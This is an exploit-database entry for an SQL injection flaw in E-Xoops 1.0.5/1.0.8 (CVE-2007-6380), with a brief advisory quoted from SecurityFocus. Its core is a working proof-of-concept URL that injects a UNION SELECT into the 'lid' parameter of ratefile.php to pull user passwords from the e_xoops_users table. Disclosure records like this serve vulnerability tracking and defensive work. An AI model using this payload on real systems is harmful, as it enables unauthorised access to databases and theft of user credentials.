E-Xoops 1.0.5/1.0.8 - '/mysections/ratefile.php?lid' SQL Injection



EKU-ID: 35879 CVE: CVE-2007-6380;OSVDB-43682 OSVDB-ID:
Author: Lostmon Published: 2007-12-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/26796/info

E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201